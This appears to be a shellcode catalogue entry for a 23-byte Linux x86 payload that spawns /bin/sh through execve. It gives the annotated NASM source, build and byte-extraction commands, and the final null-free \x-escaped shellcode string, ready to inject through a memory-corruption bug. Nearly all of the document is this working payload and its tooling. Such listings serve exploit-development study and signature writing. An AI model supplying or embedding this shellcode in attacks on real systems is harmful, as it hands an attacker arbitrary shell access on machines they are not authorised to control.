execve("/bin/sh", NULL, 0) - Spawn shell


OS: Linux

Architecture: Intel x86 (32-bit, i386)

Length: 23 bytes


Assembly

; NASM, Intel syntax. Target: Linux on 32-bit x86 (assembled with -f elf,
; linked with -m elf_i386). This is a raw ELF entry point, not a C-callable
; function: no libc, no stack frame, no prologue/epilogue.
; Kernel ABI used: eax = syscall number, ebx/ecx/edx = args 1..3, int 0x80.
section .text
global _start

;-----------------------------------------------------------------------
; _start: execve("/bin//sh", NULL, NULL)
; ABI:   Linux i386 system call (eax = nr, ebx/ecx/edx = args, int 0x80)
; In:    nothing (process entry point)
; Out:   does not return on success (the process image is replaced).
;        On failure eax = -errno and execution runs past the last
;        instruction below: no exit path is provided here.
; Regs:  ebx = path, ecx = argv (NULL), edx = envp (NULL),
;        eax = __NR_execve (11)
; Encoding note: the extracted bytes further down contain no 0x00 byte;
; registers are zeroed with xor/mul and only al is written, which is why
; the listing does not use "mov eax, 0xb" or "push 0".
; NOTE(review): this exact 23-byte sequence is widely published; expect it
; to be matched by common shellcode signatures.
;-----------------------------------------------------------------------
_start:
	xor ebx, ebx		; ebx = 0 (also the NUL dword pushed below)
	mul ebx			; edx:eax = eax * 0 -> eax = 0, edx = 0 (edx stays 0 = envp)

	mov ecx, eax		; ecx = 0 -> argv = NULL
	mov al, 0xb		; eax = 11 = __NR_execve (al only; upper bytes are already 0)

	push ebx		; NUL terminator for the path string
	push 0x68732f2f		; "//sh" in memory (2f 2f 73 68); "//" resolves like "/", pads path to 8 bytes
	push 0x6e69622f		; "/bin" in memory (2f 62 69 6e); stack now holds "/bin//sh\0"
	mov ebx, esp		; ebx = pointer to "/bin//sh\0"

	int 0x80		; execve(ebx, ecx, edx)

Compilation and Linking

# Assemble
# -f elf emits a 32-bit (ELF32) object; the listing uses 32-bit registers and int 0x80.
nasm -f elf -o code.o code.asm

# Link
# -m elf_i386 selects the 32-bit output emulation (needed on x86-64 hosts).
# No libc is linked, so _start from code.o is the program entry point.
ld -m elf_i386 -o code code.o

# Extract Shellcode
# Prints the .text bytes as one \xNN string: objdump instruction lines begin with
# whitespace (grep "^ "), the hex-byte column is the second tab-separated field
# (cut -f2), the spaces/newlines are stripped, sed appends "\x " after every byte
# pair, head -c-3 drops the trailing "\x " and the last tr removes the spaces.
# Caveats: "head -c-3" (negative count) is GNU coreutils only, not BSD/macOS head;
# the parsing assumes objdump's default text layout. Check the result for "00"
# pairs: this listing is expected to have none (see the bytes below).
printf '\\x' && objdump -d code | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n' | sed 's/.\{2\}/&\\x /g'| head -c-3 | tr -d ' ' && echo ' '

Shellcode

\x31\xdb\xf7\xe3\x89\xc1\xb0\x0b\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80